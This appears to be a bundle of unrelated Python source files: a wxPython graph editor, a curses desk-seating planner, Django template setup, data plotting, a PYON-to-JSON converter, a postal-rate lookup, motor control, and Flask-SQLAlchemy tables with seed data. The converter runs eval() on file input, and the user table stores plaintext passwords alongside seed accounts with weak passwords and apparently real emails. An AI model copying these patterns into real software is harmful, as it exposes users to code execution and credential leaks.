self.badrtext = wx.StaticText(self, label = "Please enter a number between 0 and 1", pos = (70, 0))
self.badrtext.Hide()
#treesel = False
self.Bind(wx.EVT_PAINT, self.on_paint)
self.Bind(wx.EVT_SIZE, self.on_size)
self.Bind(wx.EVT_LEFT_DOWN, self.on_click)
self.Bind(wx.EVT_MOTION, self.mouse_move)
self.Bind(wx.EVT_TEXT_ENTER, self.on_enter)
#vertex colors
self.black = wx.Brush((0,0,0))
self.red = wx.Brush((255,0,0))
self.gray = wx.Brush((150, 150, 150))
self.pink = wx.Brush((255, 100, 100))
#font styles
self.fontsizes = [20,14,10,10]
self.x_displace = [5,3,2,0]
self.y_displace = [1,4,5,5]
self.fontcolors = ["white","white","white","white"]
#function to call whenever an edge (or vertex?) is added to the graph
self.info_evt = info_evt
#which vertex is selected (red), or None if none is
self.selection = None
#string for updating divisor values
self.tempstring = ""
def on_size(self, event):
event.Skip()
self.Refresh()
def on_paint(self, event):
w,h = self.GetClientSize()
dc = wx.BufferedPaintDC(self)
dc.SetBackground(wx.Brush("white"))
dc.Clear()
gc = wx.GraphicsContext.Create(dc)
gc.SetPen(wx.Pen("black",1))
#draw edges
for edge in self.graph.edges:
ctrl = control_point(edge, self.graph)
path = gc.CreatePath()
path.MoveToPoint(edge.v1.x, edge.v1.y)
path.AddQuadCurveToPoint(ctrl.x, ctrl.y, edge.v2.x, edge.v2.y)
gc.DrawPath(path,1)
#draw vertices
for vertex in self.graph.vertices:
if vertex.selected and not vertex.hover:
gc.SetBrush(self.red)
elif vertex.selected:
gc.SetBrush(self.pink)
elif vertex.hover:
gc.SetBrush(self.gray)
else:
gc.SetBrush(self.black)
gc.DrawEllipse(vertex.x - Vertex.radius,
vertex.y - Vertex.radius,
2 * Vertex.radius,
2 * Vertex.radius)
n = self.divisor.get(vertex)
if not ((n - int(n)) == 0):
n = round(n,1)
m = len(str(n))
if m > 3:
m = 4
font = wx.Font(self.fontsizes[m-1],wx.FONTFAMILY_SWISS,1,wx.FONTWEIGHT_BOLD)
gc.SetFont(font,self.fontcolors[m-1])
gc.DrawText(str(n), vertex.x - Vertex.radius + self.x_displace[m-1],
vertex.y - Vertex.radius + self.y_displace[m-1])
#select an island in order to add a percentage of adoption
def on_click(self, event):
x,y = event.GetX(), event.GetY()
for vertex in self.graph.vertices:
if vertex.over(x, y):
if self.selection and self.selection != vertex:
#TODO: check that we didn't deselect
self.graph.add_edge(self.selection, vertex)
self.selection.selected = False
self.selection = None
self.newd.Hide()
self.badrtext.Hide()
self.update_info()
elif self.selection == vertex:
self.selection.selected = False
self.selection = None
self.newd.Hide()
self.badrtext.Hide()
self.update_info()
else:
self.selection = vertex
vertex.selected = True
self.newd.Show()
self.Refresh()
return
self.graph.add_vertex(x, y)
last = self.graph.get_last() #the vertex we just added
self.divisor.extend()
if event.ShiftDown() and self.selection:
self.graph.add_edge(self.selection, last)
self.update_info()
self.graph.deselect_all()
self.selection = last
self.selection.selected = True
self.newd.Show()
self.update_info()
self.Refresh()
def update_info(self):
self.info_evt()
def mouse_move(self, event):
#draw different colors if we're hovering
x,y = event.GetX(), event.GetY()
for vertex in self.graph.vertices:
if vertex.over(x,y):
vertex.hover = True
else:
vertex.hover = False
self.Refresh()
#enter a percentage value for a particular island
def on_enter(self, event):
self.badrtext.Hide()
try:
n = int(self.newd.GetLineText(0))
except:
try:
n = float(self.newd.GetLineText(0))
except:
print "Not a number"
self.newd.Clear()
return
if not (0 <= n <= 1):
self.badrange()
return
if self.selection:
self.divisor.set(self.selection,n)
self.divisor.generation = 0
self.newd.Hide()
self.update_info()
self.Refresh()
def badrange(self):
self.badrtext.Show()
self.newd.Clear()
def clear(self):
self.graph.clear()
self.divisor.__init__(self.graph)
self.badrtext.Hide()
self.selection = None
self.update_info()
self.Refresh()
|
#!/usr/bin/env python3
"""
Random seating planner - 2020, Nien Huei Chang
dskrnd.py - main program
"""
import json
import curses
import random
DESK_POOL = 50
DATABASE_FILE_NAME = "dskrnd.json"
database = []
screen = curses.initscr()
def read_database_file():
""" Read database from local json file """
global database
try:
with open(DATABASE_FILE_NAME) as database_file:
database = json.load(database_file)
return True
except (IOError, json.decoder.JSONDecodeError):
return False
def write_database_file():
""" Write the database list to local json file """
try:
with open(DATABASE_FILE_NAME, "w") as database_file:
json.dump(database, database_file, indent=4)
return True
except IOError:
return False
def get_assigned_desk_numbers():
""" Get a list of all assigned desk numbers from the database list """
desk_numbers = []
for record in database:
desk_number = record["desk_number"]
desk_numbers.append(desk_number)
return desk_numbers
def get_assigned_user_names():
""" Get a list of all user names from the database list """
user_names = []
for record in database:
user_name = record["user_name"]
user_names.append(user_name)
return user_names
def get_user_name(desk_number):
""" Get user name assigned to a given desk number, if none assigned return empty string """
for record in database:
if record["desk_number"] == desk_number:
return record["user_name"]
return ""
def get_desk_number(user_name):
""" Get desk number assigned to a given user name """
for record in database:
if record["user_name"] == user_name:
return record["desk_number"]
return 0
def add_desk_assignment(desk_number, user_name):
""" Add record to the database """
new_record = {
"user_name": user_name,
"desk_number": desk_number,
}
database.append(new_record)
def clear_desk_assignment(desk_number):
""" Delete the record of a given desk number """
for record in database:
if record["desk_number"] == desk_number:
del database[database.index(record)]
def wait_for_key(message=""):
""" Dispaly message (if provided) followed by "Press any key to continue..." and wait for user to press key """
if message:
screen.clear()
screen.border()
screen.addstr(2, 2, message)
screen.addstr(screen.getmaxyx()[0] - 2, 2, "Press any key to continue...")
screen.getkey()
def get_user_input(message):
""" Display message and wait for user to enter string """
screen.clear()
screen.border()
screen.addstr(2, 2, message)
curses.echo() # Show characters on screen as they are typed by user
curses.curs_set(True) # Show cursor
user_input = screen.getstr().decode("utf-8")
curses.curs_set(False) # Hide cursor
curses.noecho() # Do not show user typed characters on the screen
return user_input
def assign_desk():
""" Get user name and assign it to a random desk number """
if len(get_assigned_desk_numbers()) >= DESK_POOL:
wait_for_key("No free desk available.")
return
while True:
user_name = get_user_input("Please enter user name (2 - 17 characters, empty to cancel): ")
if len(user_name) == 0:
break
if len(user_name) < 2:
wait_for_key("User name too short.")
continue
if len(user_name) > 17:
wait_for_key("User name too long.")
continue
if user_name in get_assigned_user_names():
wait_for_key(f"User '{user_name}' has been found in database assigned to desk number {get_desk_number(user_name)}.")
continue
all_desks = set(range(1, DESK_POOL + 1))
assigned_desks = set(get_assigned_desk_numbers())
free_desks = list(all_desks - assigned_desks)
desk_number = random.choice(free_desks)
add_desk_assignment(desk_number, user_name)
wait_for_key(f"User '{user_name}' has been assigned to desk number {desk_number}.")
break
def clear_desk():
""" Remove the record associated with user provided desk number """
if len(get_assigned_desk_numbers()) == 0:
wait_for_key("No desks assigned yet.")
return
while True:
desk_number = get_user_input(f"Please enter desk number (1 - {DESK_POOL}, empty to cancel): ")
if len(desk_number) == 0:
break
if not desk_number.isdigit():
wait_for_key(f"Desk number must be a number in range 1 - {DESK_POOL} range.")
continue
desk_number = int(desk_number)
if not (1 <= desk_number <= DESK_POOL):
wait_for_key(f"Desk number must be a number in range 1 - {DESK_POOL} range.")
continue
if desk_number not in get_assigned_desk_numbers():
wait_for_key(f"Desk number {desk_number} is not assigned to any user.")
continue
clear_desk_assignment(desk_number)
wait_for_key(f"Desk {desk_number} has been cleared.")
break
def show_desks():
""" Display all desk / user assignments sorted by desk number """
screen.clear()
screen.border()
y = 2
x = 2
for desk_number in range(1, DESK_POOL + 1):
if y == screen.getmaxyx()[0] - 4:
y = 2
x += 25
screen.addstr(y, x, f"{desk_number:2} - {get_user_name(desk_number)}")
y += 1
wait_for_key()
def show_users():
""" Display all desk / user assignments sorted by user name """
screen.clear()
screen.border()
y = 2
x = 2
for user_name in sorted(get_assigned_user_names()):
if y == screen.getmaxyx()[0] - 4:
y = 2
x += 25
screen.addstr(y, x, f"{user_name:17} - {get_desk_number(user_name):2}")
y += 1
wait_for_key()
def main(_):
""" Display main menu and wait for user's instruction """
read_database_file()
curses.noecho() # Do not show user typed characters on the screen
curses.curs_set(False) # Hide cursor
while True:
if screen.getmaxyx()[0] < 24 or screen.getmaxyx()[1] < 80:
screen.clear()
screen.addstr(0, 0, f"Terminal window needs to be at least 80x24, please adjust the window size...")
screen.getkey() # Wait for 'KEY_RESIZE' keypad constant or any keycode returned by terminal when user resizes window
continue
screen.clear()
screen.border()
screen.addstr(2, 2, "Main menu")
screen.addstr(4, 2, "1. Assign desk")
screen.addstr(5, 2, "2. Clear desk")
screen.addstr(6, 2, "3. Show desks")
screen.addstr(7, 2, "4. Show users")
screen.addstr(9, 2, "0. Save data and exit program")
key = screen.getkey()
if key == "1":
assign_desk()
elif key == "2":
clear_desk()
elif key == "3":
show_desks()
elif key == "4":
show_users()
elif key == "0":
break
write_database_file()
if __name__ == "__main__":
curses.wrapper(main)
|
import os
import sys
from django.utils.crypto import get_random_string
def get_settings_file_name():
return get_project_file_name('settings.py')
def get_project_file_name(file_name):
return os.path.join(project_name, file_name)
def generate_secret_key():
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
return get_random_string(50, chars)
def update_settings_file():
with open(get_settings_file_name()) as f:
file_data = f.read()
for placeholder, value in (
('<secret_key>', generate_secret_key()),
('<project_name>', project_name),
('<app_name>', app_name),
('<db_name>', db_name),
('<db_user>', db_user),
('<db_password>', db_password),
):
file_data = settings_file.replace(placeholder, value)
with open(get_settings_file_name(), 'w') as f:
f.write(file_data)
def update_file(file_name, replace_list):
with open(file_name) as f:
file_data = f.read()
for placeholder, value in replace_list:
file_data = file_data.replace(placeholder, value)
with open(file_name, 'w') as f:
f.write(file_data)
if __name__ == '__main__':
# app_name = input('app name: ')
app_name = sys.argv[1]
project_name = app_name + '_project'
db_name = app_name
db_user = app_name
# db_password = input('database password: ')
db_password = sys.argv[2]
os.rename('template/static/template', 'template/static/' + app_name)
os.rename('template/templates/template', 'template/templates/' + app_name)
os.rename('template', app_name)
os.rename('template_project', project_name)
file_names = (
'manage.py',
'.gitignore',
'gulpfile.js',
'reset_db.sh',
project_name + '/settings.py',
project_name + '/urls.py',
project_name + '/wsgi.py',
app_name + '/apps.py',
app_name + '/urls.py',
app_name + '/views.py',
app_name + '/templates/' + app_name + '/base.html',
app_name + '/templates/' + app_name + '/home.html',
)
secret_key = generate_secret_key()
replace_list = (
('<secret_key>', secret_key),
('<project_name>', project_name),
('<app_name>', app_name),
('<app_name_title>', app_name.title()),
('<db_name>', db_name),
('<db_user>', db_user),
('<db_password>', db_password),
)
for file_name in file_names:
update_file(file_name, replace_list)
|
# -*- coding=utf-8 -*-
'''
Created on 2016年3月7日
@author: YANG
'''
import os
import xlrd
import matplotlib.pyplot as plt
"145800_ViVo_City"
if __name__=="__main__":
path = "C:\\Users\YANG\Desktop\Data" #os.path.dirname("statistic.py")
book = xlrd.open_workbook("%s\\4.xls"%path)
sheet = book.sheet_by_index(0)
dic = {}
problems = {}
time = {}
for rowIndex in range(8,sheet.nrows):
if(sheet.cell_value(rowIndex,2)!="130850_ITS_Centre"):
continue
pass
try:
dic[sheet.cell_value(rowIndex,2)] += 1
except:
dic[sheet.cell_value(rowIndex,2)] = 1
if(not time.__contains__(sheet.cell_value(rowIndex,0))):
time[sheet.cell_value(rowIndex,0)] = [0,0]
if(not problems.__contains__(sheet.cell_value(rowIndex,2))):
problems[sheet.cell_value(rowIndex,2)] = 0
if(sheet.cell_value(rowIndex,17)!="NIL" and float(sheet.cell_value(rowIndex,17))<99.5):
time[sheet.cell_value(rowIndex,0)][0] += 1
problems[sheet.cell_value(rowIndex,2)] += 1
else:
time[sheet.cell_value(rowIndex,0)][1] += 1
for item in problems:
problems[item] /= dic[item]
sorted_result = sorted(time.items(), key= lambda x:x[0], reverse=True)
for item in sorted_result:
print(item,time[item[0]][0]/(time[item[0]][1]+1))
pass
index = 0
x = []
y = []
for item in sorted_result[-7:]:
x.append(index)
index += 1
y.append(time[item[0]][0]/(time[item[0]][1]+time[item[0]][0]))
for item in sorted_result[:-8]:
x.append(index)
index += 1
y.append(time[item[0]][0]/(time[item[0]][1]+time[item[0]][0]))
plt.plot(x, y, '-*')
plt.title('')
plt.ylabel('ratio')
plt.xlabel('time')
plt.show()
|
"""
Python object notation to JSON.
"""
import json
from pathlib import Path
import click
from . import cli
def do_pyon2json(ifname, ofname, pretty=True):
"""
Convert the python object notation file to json object notation file.
"""
with open(ifname, "r") as fin:
x = fin.read()
x = eval(x)
if pretty:
x = json.dumps(x, indent=2, sort_keys=True)
else:
x = json.dumps(x)
with open(ofname, "w") as fout:
fout.write(x)
@cli.command()
@click.option("-i", "--input", type=str, default=None, help="Input file name")
@click.option("-o", "--output", type=str, default=None, help="Output file name")
@click.option("-s", "--suffix", default=".json", help="Output file suffix")
@click.option("--pretty/--no-pretty", help="Output pretty json")
@click.argument("files", type=str, nargs=-1)
def pyon2json(input, output, suffix, pretty, files):
"""
Convert the files from PYON to JSON.
"""
if not input and not files:
raise click.UsageError("No input files provided")
if input and files:
raise click.UsageError("Both --input and files can't be specified")
if input:
ifnames = [Path(input)]
else:
ifnames = [Path(f) for f in files]
if len(ifnames) > 1 and output:
raise click.UsageError("--output specified with multiple input files")
if output:
ofnames = [output]
else:
ofnames = []
for ifname in ifnames:
ofname = ifname.with_suffix(suffix)
ofnames.append(ofname)
for ifname, ofname in zip(ifnames, ofnames):
do_pyon2json(ifname, ofname, pretty)
|
from pprint import pprint
from correios import calc_preco_prazo
response = calc_preco_prazo(
cep_origem='70002900',
cep_destino='04547000',
peso='1',
altura='20',
largura='20',
comprimento='20',
servicos=['04510', '04014'],
empresa='08082650',
senha='564321',
)
pprint(response)
|
#!/usr/bin/python
import numpy as np
import math
from roboclaw import *
speed = 16384
print "started"
while True:
print "loop begin"
SetM1Speed(128,speed)
SetM2Speed(129,speed)
SetM2Speed(128,speed)
time.sleep(1)
# print readM1instspeed(128)
# print readM2instspeed(128)
# print readM2instspeed(129)
time.sleep(1)
|
#!/usr/bin/env python3
from time import sleep, time
import os
from sys import stdout
mlockall = True
if mlockall:
from ctypes import CDLL
CDLL('libc.so.6').mlockall(3)
psi_path = '/proc/pressure/memory'
psi_support = os.path.exists(psi_path)
def rline1(path):
"""read 1st line from path."""
with open(path) as f:
for line in f:
return line[:-1]
def psi_mem_some_avg_total():
return float(rline1(psi_path).rpartition('=')[2])
avg_min_time = 1
if psi_support:
ta0 = time()
a0 = psi_mem_some_avg_total()
while True:
if psi_support:
ta1= time()
dt = ta1 - ta0
if dt >= avg_min_time:
a1 = psi_mem_some_avg_total()
avg = (a1 - a0) / (ta1 - ta0) / 10000
print('avg time:', round(dt, 1))
print('PSI mem avg:', round(avg, 2))
print(rline1(psi_path), '\n')
ta0 = ta1
a0 = a1
stdout.flush()
sleep(0.1)
|
"""
sql_tables.py: all SQL table definitions and bootstrapping goes here
"""
import datetime
from backend_main import DB
class Sys_user_role(DB.Model):
"""
system user role database table definition
Stores roles for sys_user
1 = Order Taker
2 = Order Fulfiller
3 = Administrator
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
name = DB.Column(DB.String(50), nullable=False, unique=True)
def __init__(self, name):
self.name = name
def request_sys_user_role_info(self):
"""
produces a dictionary of all relevant sys_user_role information
"""
return {
"id": self.id,
"name": self.name
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for Sys_user_role
"""
database.session.add(Sys_user_role("Order Taker"))
database.session.add(Sys_user_role("Order Fulfiller"))
database.session.add(Sys_user_role("Administrator"))
database.session.commit()
class Sys_user(DB.Model):
"""
sys_user database table definition
Stores all employee / system user information
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
name_first = DB.Column(DB.String(50), nullable=False)
name_last = DB.Column(DB.String(50), nullable=False)
sys_username = DB.Column(DB.String(50), nullable=False, unique=True)
# Note, password is currently plain text. In the future,
# make this a hash with a salt, make salt another field
password = DB.Column(DB.String(255), nullable=False)
email_google = DB.Column(DB.String(100), nullable=False, unique=True)
email_fb = DB.Column(DB.String(100), nullable=False, unique=True)
image_url = DB.Column(DB.String(500), nullable=False)
phone_number = DB.Column(DB.String(10), nullable=True)
role = DB.Column(DB.Integer, DB.ForeignKey("sys_user_role.id"), nullable=False)
def __init__(self, first, last, username, password, google, facebook, image, phone, role):
self.name_first = first
self.name_last = last
self.sys_username = username
self.password = password
self.email_google = google
self.email_fb = facebook
self.image_url = image
self.phone_number = phone
self.role = role
def request_sys_user_info(self, database):
"""
produces a dictionary of all relevant sys_user information
"""
sys_user_role = (
database.session.query(Sys_user_role)
.filter(Sys_user_role.id == self.role)
.all()
)[0].request_sys_user_role_info()
return {
"id": self.id,
"name_first": self.name_first,
"name_last": self.name_last,
"sys_username": self.sys_username,
"email_google": self.email_google,
"email_fb": self.email_fb,
"image_url": self.image_url,
"phone_number": self.phone_number,
"sys_user_role": sys_user_role,
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for sys_user
"""
database.session.add(
Sys_user(
"Order",
"Taker",
"order_taker",
"ot1234",
"order_taker@gmail.com",
"order_taker@other.com",
"https://images.squarespace-cdn.com/content/v1/55ad5011e4b026cf25" +
"25000a/1441740484174-PTHHQBWISMSJUC9OS1RX/ke17ZwdGBToddI8pDm4" +
"8kP06O0_IHyRXSOOiqwgWaApZw-zPPgdn4jUwVcJE1ZvWEtT5uBSRWt4vQZAg" +
"TJucoTqqXjS3CfNDSuuf31e0tVEHLRkg2cosQUGLeQ33UzXdgIxPDaVwE3LlE" +
"pL74qP4JVW4jCyXLPvvdR287iymYt8/the-letter-t.jpg",
"1234567890",
1,
)
)
database.session.add(
Sys_user(
"Order",
"Fulfiller",
"order_fulfiller",
"of1234",
"order_fulfiller@gmail.com",
"order_fulfiller@other.com",
"https://i.redd.it/o8rz4s0lxp021.png",
"1234567890",
2,
)
)
database.session.add(
Sys_user(
"Administrator",
"",
"admin",
"root",
"administrator@gmail.com",
"administrator@other.com",
"https://lh3.googleusercontent.com/proxy/RNhuhNzPCOufEUuiXAZ6R49T" +
"4H1qAjaXoVhXv7dZ4SDkTGXzkpFm8AsNAOxgxHgsRJGWuVa_OAM2l7iZ7YJDM" +
"rrOe2AIi1U",
"1234567890",
3,
)
)
database.session.add(
Sys_user(
"Denisse",
"Mendoza",
"denisse",
"dm1234",
"dm464@njit.edu",
"idislexiaheart@aol.com",
"https://i0.wp.com/thevitpro.com/wp-content/uploads/2019/07/Lette" +
"r-D.png?fit=551%2C640&ssl=1",
"1234567890",
1,
)
)
database.session.add(
Sys_user(
"Tylor",
"Autore",
"tylor",
"ta1234",
"tma26@njit.edu",
"hellfrost@embarqmail.com",
"https://pioneerinstitute.org/wp-content/uploads/MBTA-T-sign-e143" +
"8701323593.png",
"9739199865",
2,
)
)
database.session.add(
Sys_user(
"Abdul-Quddus",
"Adeniji",
"abdul",
"aq1234",
"aqadeniji@gmail.com",
"abdul83@ymail.com",
"https://lh3.googleusercontent.com/proxy/DuGp1GYoFa1QAqNutn5Ga0eWg" +
"B2BlYJaHU5QeQpNJtSXIPOmdmBms6yPWP7F7MpUxd8kNtAqYtqMub-byZ-LJ-R" +
"quvoun_xfE3eobkfctl0v",
"1234567890",
2,
)
)
database.session.add(
Sys_user(
"Zoraiz",
"Naeem",
"zoraiz",
"zn1234",
"zoraiznaeem9@gmail.com",
"zoraiznaeem9@gmail.com",
"https://static6.depositphotos.com/1001599/647/i/600/depositphoto" +
"s_6477200-stock-photo-fire-letters-a-z.jpg",
"1234567890",
1,
)
)
database.session.commit()
class Zone(DB.Model):
"""
zone database table definition
Zones are assigned to companyies and shops
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
name = DB.Column(DB.String(100), nullable=False, unique=True)
def __init__(self, name):
self.name = name
def request_zone_info(self):
"""
produces a dictionary of all relevant zone information
"""
return {
"id": self.id,
"name": self.name
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for zone
"""
database.session.add(Zone("Temp Zone 1"))
database.session.add(Zone("Temp Zone 2"))
database.session.add(Zone("Temp Zone 3"))
database.session.add(Zone("Temp Zone 4"))
database.session.commit()
class Shop_category(DB.Model):
"""
shop category database table definition
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
type = DB.Column(DB.String(100), nullable=False, unique=True)
def __init__(self, sc_type):
self.type = sc_type
def request_category_info(self):
"""
produces a dictionary of all relevant shop information
"""
return {
"id": self.id,
"type": self.type
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for Shop_category
"""
database.session.add(Shop_category("Temp Category 1"))
database.session.add(Shop_category("Temp Category 2"))
database.session.commit()
class Shop(DB.Model):
"""
shop database table definition
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
name = DB.Column(DB.String(100), nullable=False)
email = DB.Column(DB.String(100), nullable=True)
image_url = DB.Column(DB.String(500), nullable=False)
phone_number = DB.Column(DB.String(10), nullable=True)
category = DB.Column(DB.Integer, DB.ForeignKey("shop_category.id"), nullable=True)
street = DB.Column(DB.String(255), nullable=False)
city = DB.Column(DB.String(255), nullable=False)
providence = DB.Column(DB.String(255), nullable=False)
zip_4 = DB.Column(DB.String(10), nullable=False)
def __init__(self, name, email, image, phone, category, street, city, providence, zipcode):
self.name = name
self.email = email
self.image_url = image
self.phone_number = phone
self.category = category
self.street = street
self.city = city
self.providence = providence
self.zip_4 = zipcode
def request_shop_info(self, database):
"""
produces a dictionary of all relevant shop information
"""
if self.category is not None:
shop_category_info = (
database.session.query(Shop_category)
.filter(Shop_category.id == self.category)
.all()
)[0].request_category_info()
else:
shop_category_info = None
shop_zone_query = (
database.session.query(Shop_zone).filter(Shop_zone.shop == self.id).all()
)
zones = []
for zone in shop_zone_query:
zones.append(zone.request_zone_info(database))
return {
"id": self.id,
"name": self.name,
"email": self.email,
"image_url": self.image_url,
"phone_number": self.phone_number,
"category": shop_category_info,
"zones": zones,
"street": self.street,
"city": self.city,
"providence": self.providence,
"zip_4": self.zip_4,
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for shop
"""
database.session.add(
Shop(
"Temp Store 1",
None,
"https://yt3.ggpht.com/ytc/AAUvwnjLNdkBK-GXpJJQ8K9Nku_gHwS5f" +
"WUKkq0BEoPgTA=s900-c-k-c0x00ffffff-no-rj",
"1234567890",
None,
"Street 1",
"City 1",
"Providence 1",
"12345-1234",
)
)
database.session.add(
Shop(
"Temp Store 2",
"ts2@store.com",
"https://www.clker.com/cliparts/V/H/K/p/p/u/number-2-black-" +
"hi.png",
"1234567890",
1,
"Street 2",
"City 2",
"Providence 2",
"12345-1234",
)
)
database.session.add(
Shop(
"Temp Store 3",
None,
"https://blognumbers.files.wordpress.com/2010/09/3.jpg",
"1234567890",
2,
"Street 3",
"City 3",
"Providence 3",
"12345-1234",
)
)
database.session.commit()
class Shop_zone(DB.Model):
"""
shop_zone database table definition
"""
shop = DB.Column(
DB.Integer, DB.ForeignKey("shop.id"), primary_key=True, nullable=False
)
zone = DB.Column(
DB.Integer, DB.ForeignKey("zone.id"), primary_key=True, nullable=False
)
def __init__(self, shop, zone):
self.shop = shop
self.zone = zone
def request_zone_info(self, database):
"""
produces a dictionary of all relevant zone information
"""
zone_name = (database.session.query(Zone).filter(Zone.id == self.zone).all())[
0
].name
return {
"id": self.zone,
"name": zone_name
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for shop_zone
"""
database.session.add(Shop_zone(1, 1))
database.session.add(Shop_zone(1, 4))
database.session.add(Shop_zone(2, 3))
database.session.add(Shop_zone(3, 1))
database.session.add(Shop_zone(3, 2))
database.session.add(Shop_zone(3, 3))
database.session.add(Shop_zone(3, 4))
database.session.commit()
class Company(DB.Model):
"""
company database table definition
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
name = DB.Column(DB.String(100), nullable=False, unique=True)
image_url = DB.Column(DB.String(500), nullable=False)
def __init__(self, name, image):
self.name = name
self.image_url = image
def request_company_info(self, database):
"""
produces a dictionary of all relevant company_product information
"""
company_zone_query = (
database.session.query(Company_zone)
.filter(Company_zone.company == self.id)
.all()
)
zones = []
for zone in company_zone_query:
zones.append(zone.request_zone_info(database))
return {
"id": self.id,
"name": self.name,
"image_url": self.image_url,
"zones": zones
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for company
"""
database.session.add(
Company(
"Company 1",
"https://upload.wikimedia.org/wikipedia/commons/thum" +
"b/3/3f/NYCS-bull-trans-1.svg/1024px-NYCS-bull-tr" +
"ans-1.svg.png"
)
)
database.session.add(
Company(
"Company 2",
"https://upload.wikimedia.org/wikipedia/commons/thum" +
"b/6/61/NYCS-bull-trans-2.svg/1200px-NYCS-bull-tr" +
"ans-\2.svg.png"
)
)
database.session.commit()
class Company_zone(DB.Model):
"""
company_zone database table definition
"""
company = DB.Column(
DB.Integer, DB.ForeignKey("company.id"), primary_key=True, nullable=False
)
zone = DB.Column(
DB.Integer, DB.ForeignKey("zone.id"), primary_key=True, nullable=False
)
def __init__(self, company, zone):
self.company = company
self.zone = zone
def request_zone_info(self, database):
"""
produces a dictionary of all relevant zone information
"""
zone_name = (database.session.query(Zone).filter(Zone.id == self.zone).all())[
0
].name
return {
"id": self.zone,
"name": zone_name
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for company_zone
"""
database.session.add(Company_zone(1, 2))
database.session.add(Company_zone(1, 3))
database.session.add(Company_zone(2, 1))
database.session.add(Company_zone(2, 4))
database.session.commit()
class Company_product(DB.Model):
"""
company_product database table definition
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
company = DB.Column(DB.Integer, DB.ForeignKey("company.id"), nullable=False)
name = DB.Column(DB.String(100), nullable=False)
price_buy = DB.Column(DB.Numeric(10, 2), nullable=False)
price_sell = DB.Column(DB.Numeric(10, 2), nullable=False)
units_per_price = DB.Column(DB.Integer, nullable=False)
stock = DB.Column(DB.Integer, nullable=False)
image_url = DB.Column(DB.String(500), nullable=False)
description = DB.Column(DB.String(255), nullable=True)
def __init__(self, company, name, buy, sell, unit, stock, image, description):
self.company = company
self.name = name
self.price_buy = buy
self.price_sell = sell
self.units_per_price = unit
self.stock = stock
self.image_url = image
self.description = description
def request_company_product_info(self, database):
"""
produces a dictionary of all relevant company_product information
"""
company = (
database.session.query(Company).filter(Company.id == self.company).all()
)[0].request_company_info(database)
return {
"id": self.id,
"company": company,
"name": self.name,
"price_buy": float(self.price_buy),
"price_sell": float(self.price_sell),
"units_per_price": self.units_per_price,
"price_sell_per_unit": float(self.price_sell / self.units_per_price),
"stock": self.stock,
"image_url": self.image_url,
"description": self.description
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for company_product
"""
database.session.add(
Company_product(
1,
"C1 Item 1",
1.00,
2.00,
1,
10,
"https://www.kindpng.com/picc/m/11-112771_1-number-" +
"circle-desgin-png-1-2-3.png",
None
)
)
database.session.add(
Company_product(
1,
"C1 Item 2",
2.00,
4.00,
2,
12,
"https://cdn.picpng.com/2/photo-2-35361.png",
"Item 2!"
)
)
database.session.add(
Company_product(
1,
"C1 Item 3",
300.00,
600.00,
30,
33,
"https://blognumbers.files.wordpress.com/2010/09/3.jpg",
"Big Item 3"
)
)
database.session.add(
Company_product(
1,
"C1 Item 4",
44.00,
88.00,
4,
100,
"https://blognumbers.files.wordpress.com/2010/09/4.jpg",
None
)
)
database.session.add(
Company_product(
2,
"C2 Item 1",
100.00,
200.00,
1,
22,
"https://www.kindpng.com/picc/m/11-112771_1-number-" +
"circle-desgin-png-1-2-3.png",
"Big Item"
)
)
database.session.add(
Company_product(
2,
"C2 Item 2",
0.01,
0.02,
1,
33,
"https://cdn.picpng.com/2/photo-2-35361.png",
"Small Item"
)
)
database.session.add(
Company_product(
2,
"C2 Item 3",
10000.00,
20000.00,
1,
5,
"https://blognumbers.files.wordpress.com/2010/09/3.jpg",
"Huge Item"
)
)
database.session.add(
Company_product(
2,
"C2 Item 4",
4.44,
8.88,
1,
400,
"https://blognumbers.files.wordpress.com/2010/09/4.jpg",
None
)
)
database.session.commit()
class Shop_order(DB.Model):
"""
shop_order database table definition
"""
id = DB.Column(DB.Integer, primary_key=True, nullable=False)
shop = DB.Column(DB.Integer, DB.ForeignKey("shop.id"), nullable=False)
price_due = DB.Column(DB.Numeric(10, 2), nullable=False)
price_paid = DB.Column(DB.Boolean(), nullable=False)
memo = DB.Column(DB.String(500), nullable=False)
date_ordered = DB.Column(DB.DateTime(True), nullable=False)
date_delivered_projected = DB.Column(DB.DateTime(True), nullable=False)
date_delivered = DB.Column(DB.DateTime(True), nullable=True)
order_taker = DB.Column(DB.Integer, DB.ForeignKey("sys_user.id"), nullable=False)
order_fulfiller = DB.Column(DB.Integer, DB.ForeignKey("sys_user.id"), nullable=True)
completed = DB.Column(DB.Boolean(), nullable=False)
def __init__(self, shop, due, paid, memo, ordered, projected,
delivered, taker, fulfiller, completed):
self.shop = shop
self.price_due = due
self.price_paid = paid
self.memo = memo
self.date_ordered = ordered
self.date_delivered_projected = projected
self.date_delivered = delivered
self.order_taker = taker
self.order_fulfiller = fulfiller
self.completed = completed
def request_shop_order(self, database):
"""
produces a dictionary of all relevant shop_order information
"""
shop_entry = (database.session.query(Shop).filter(Shop.id == self.shop).all())[
0
]
order_taker = (
database.session.query(Sys_user)
.filter(Sys_user.id == self.order_taker)
.all()
)[0].request_sys_user_info(database)
if self.order_fulfiller is not None:
order_fulfiller = (
database.session.query(Sys_user)
.filter(Sys_user.id == self.order_fulfiller)
.all()
)[0].request_sys_user_info(database)
else:
order_fulfiller = None
shop_order_items_query = (
database.session.query(Shop_order_item)
.filter(Shop_order_item.shop_order == self.id)
.all()
)
shop_order_items = []
for entry in shop_order_items_query:
shop_order_items.append(entry.request_shop_order_item_info(database))
return {
"id": self.id,
"shop": shop_entry.request_shop_info(database),
"price_due": float(self.price_due),
